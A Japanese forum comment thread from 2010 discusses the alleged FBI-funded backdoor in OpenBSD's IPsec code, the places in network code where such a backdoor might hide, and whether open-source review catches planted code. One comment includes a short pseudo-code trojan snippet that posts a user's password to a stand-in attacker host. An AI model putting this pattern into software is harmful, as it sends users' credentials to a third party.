パスワードを忘れた? アカウント作成
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

FBI、OpenBSDのIPSEC開発者に金銭を送りバックドアを仕込んでいた?」記事へのコメント

  • Damien Miller 氏によれば、暗号そのものは恐らく安全であろう、とのことです。
    http://permalink.gmane.org/gmane.os.openbsd.tech/22559 [gmane.org]

    何かを仕込むとすればネットワーク関連のコードで、
    鍵データがパディングに混入するようにしたり、
    秘密データに隣接する部分を読むとき「うっかりはみ出す」ようにしたり、
    mbuf を「うっかり再利用する」ようにしたり、
    タイミング攻撃によるサイドチャネル (2000年当時はあまり知られていなかった) を用意したり
    といった可能性が思いつく、と書いています。

    そのうちの幾つかは対策が取られていますが、
    すべて疑念を晴らすには地道なコード監査以外ないようです。

    • by Anonymous Coward on 2010年12月15日 19時56分 (#1874373)
      >すべて疑念を晴らすには地道なコード監査以外ない
      これって、OS全体のソースの量的規模が大きすぎてチェックする人的資源のほうが届かないため、指摘されない限りは不正なコードを仕込み放題ってことなんですかね?せっかくのオープンソースも、ホンネとしては機能していないってことでしょうか。
      親コメント
      • Re:バックドアの余地は (スコア:2, すばらしい洞察)

        by Anonymous Coward on 2010年12月15日 20時58分 (#1874425)

        (リスクが)0か0でないか、でいえば0でないわけですが、作者を完全に信頼するしかないレベルと、作者やcontributerも「見られているぞ」というレベルではコトの難易度が全然違うでしょう。そういう意味での相対的な安全なわけで、絶対的安全なんてもともとどこにも存在しない。

        極端な話、以下のような見え見えなコードはすぐバレるわけで。でも、トロイの木馬ってだいたいこういう構成ですよね。

        password = getPasswordFromUser();
        app.do_auth(password);
        http.post("http://evilhost.example.com/passwordstealer.pl", {"password":password});

        ふと思ったんだけど、監視カメラと同程度の代物なのかもしれませんね。全部のカメラを見ていることはできないが、見られている/記録に残っているということ自体が抑止力になると。

        親コメント
        • by Anonymous Coward
          抑止力である一方、油断しやすいという諸刃の剣でしょう。

          > 作者を完全に信頼するしかないレベル

          その考え方は間違いです。バイナリ提供の場合は疑わしいものとして扱います。
          一方、オープンソースを疑わしいものとして扱っているでしょうか? そこに油断があると思いますよ。
          • by Anonymous Coward

            横からですが。
            バイナリの危険性は、怪しい処理が仕込まれているならアンチウィルスソフトウェアのクラウドによるモルモット実験である程度分かりますが、完璧には無理です。
            また、バイナリは、故意の脆弱性によるバックドアが仕込まれていないかどうかの検証を簡単にはできません。
            # それでもセキュリティ会社は必死に脆弱性を見つけていますけどね

            オープンソースは、怪しい処理が無いかの確認や脆弱性探索は容易なので、静的検証(Coverityなど)・動的検証(Valgrindなど)が行われたり、企業のセキュリティチームが中心となって人力でチェックしたりされています。
            けれども、未チェックなソフトウェアや、チェッカで危険性が検出されたまま放置されているソフトウェアも多いのが現状。署名無しでソースコードのtarボールが公開されているということも少なくなったとはいえまだまだありますね。

      • OpenBSD の場合は、
        誰かから ok をもらわないと cvs commit もできませんから、ある程度は防いでいるとは思いますし、
        新規に知られるようになった exploit 手法についても source tree 全体を見てまわりますが、
        基本的に開発者を疑っているわけではないので、ご期待のレベルには達していないかもしれません。

        http://www.itwire.com/opinion-and-analysis/open-sauce/43995-openbsd-ba... [itwire.com]
        iTWire によると、今回のメールをきっかけに audit していて 2 つ以上のバグが発見されており、
        そうしたバグの「考古学的な」調査も続いていくようです。

        親コメント
      • 大丈夫でしょう (スコア:1, 参考になる)

        by Anonymous Coward on 2010年12月15日 23時47分 (#1874532)
        (セキュリティを調査する目的で)試しにanonymousでそういうコードをcommitしてみたことがあるけど、すぐに削除されました。 ある程度のメジャーどころは、パートごとに主要開発者いてコードを子供のようにかわいがっていますから、怪しいコードがcommitされてきたら一発でrejectでしょうね。
        親コメント
        • by Anonymous Coward on 2010年12月16日 6時49分 (#1874630)

          > 試しにanonymousでそういうコードをcommitしてみたことがあるけど、

          そもそも OpenBSD はそういう形態じゃありません。
          Theo が認めた人間にしか commit 権限はありません。

          > パートごとに主要開発者いてコードを子供のようにかわいがっていますから、怪しいコードがcommitされてきたら一発でrejectでしょうね。

          今回のは、開発者自らが怪しいコードを commit したという話ですが。

          親コメント
          • by Anonymous Coward

            >> 試しにanonymousでそういうコードをcommitしてみたことがあるけど、
            > そもそも OpenBSD はそういう形態じゃありません。
            というかanonymousでもソースをコミットできるってどんなOSSプロジェクト? ど素人がウィキペディアか何かからの類推か何かで大ボラこいてるとしか思えないんですが。
            これにプラスモデがつくんだからスラドからはつくづく開発者がいなくなったもんだと思いますね。

            • by Anonymous Coward
              用語も知らずに send-pr とか bug tracking system の類いで レポートか何かを送ったとかを「(自称)commit」と言っているだけでしょう

アレゲは一日にしてならず -- アレゲ見習い

処理中...